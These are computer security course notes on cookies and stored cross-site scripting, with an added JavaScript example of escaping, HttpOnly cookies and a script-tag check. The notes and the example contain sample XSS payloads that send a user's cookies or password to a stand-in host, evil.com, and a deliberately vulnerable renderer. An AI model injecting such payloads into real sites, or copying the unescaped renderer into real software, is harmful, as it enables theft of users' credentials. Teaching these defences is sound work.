CS338 Computer Security
Wednesday, 25 May 2022

+ In defense of a liberal arts background to help you make sense of tech in the world
  https://yro.slashdot.org/story/22/05/24/218210/bing-contract-prohibits-duckduckgo-from-completely-blocking-microsoft-tracking
+ Questions?
+ Reading/viewing
  - More privacy discussion Friday
+ Lab today
  - Cookies
  - Cross-site scripting (XSS)

=======

- Website can store data on the user's computer via cookies
  - "HTTP is stateless"
- How to send user's username/password cookies to somebody else
  - Moriarty puts JavaScript like this in a post

    // code to extract user name and password from
    // this user's cookies for FDF
    var url = 'http://evil.com/?user=' + user + '&pw=' + pw;
    fetch(url, {method:'get'}) ... ;

  - M also sets up an API at evil.com to receive this kind of URL
  - Alice logs in to FDF
  - Alice views M's evil post
  - Evil post sends Alice's user name and pw to evil.com
- Protections
  - Browsers can try to detect code inside what should be data
  - Web developers can be careful
    - Frameworks have some ways of helping
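The "Protections" bullets above are where the lab's defensive work happens. The following is an added example (not part of the course notes, and not FDF's code) showing the two developer-side mitigations side by side: a post renderer that concatenates untrusted text straight into markup, so the browser parses a script tag in the post as code, next to a renderer that escapes every untrusted field first, so the same post reaches the browser as inert text. It also builds a Set-Cookie header with the HttpOnly flag, which stops page scripts from reading the session cookie at all, so even an injected script has nothing to send to evil.com. The function names (escapeHtml, renderPostUnsafe, renderPostSafe, sessionCookieHeader, containsScriptTag) and the sample post body are constructed for this example.

```javascript
// Added example: rendering untrusted post text as data, not code.
// All names and the sample post below are constructed for illustration.

// Escape the five characters that can change parsing context inside HTML
// text nodes and quoted attribute values.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable renderer: the post body goes into the page verbatim, so a body
// containing <script>...</script> is executed by every viewer's browser
// (stored XSS, the Moriarty/Alice scenario in the notes).
function renderPostUnsafe(author, body) {
  return '<div class="post"><b>' + author + '</b>: ' + body + '</div>';
}

// Hardened renderer: every untrusted field is escaped before it touches the
// markup. The same body arrives as &lt;script&gt;... and is displayed, not run.
// Template frameworks do this escaping by default, which is the
// "frameworks have some ways of helping" point.
function renderPostSafe(author, body) {
  return '<div class="post"><b>' + escapeHtml(author) + '</b>: ' +
         escapeHtml(body) + '</div>';
}

// Cookie-side defence in depth: HttpOnly hides the cookie from document.cookie,
// Secure restricts it to HTTPS, SameSite=Lax keeps it off most cross-site requests.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Crude presence check used only to contrast the two renderers; a real check
// belongs in a parser or in a Content-Security-Policy, not in a regex.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample post in the spirit of the notes' evil post.
const maliciousBody = '<script>fetch("http://evil.com/?c=" + document.cookie)</script>';

console.log('unsafe:', renderPostUnsafe('moriarty', maliciousBody));
console.log('safe:  ', renderPostSafe('moriarty', maliciousBody));
console.log('cookie:', sessionCookieHeader('session', 'abc 123'));
```

Run it with `node` and compare the two rendered strings: only the unsafe one still contains a live `<script` tag. Escaping at output time is the rule to apply everywhere user-supplied text is placed into HTML; HttpOnly is the fallback that limits the damage when an escape is missed.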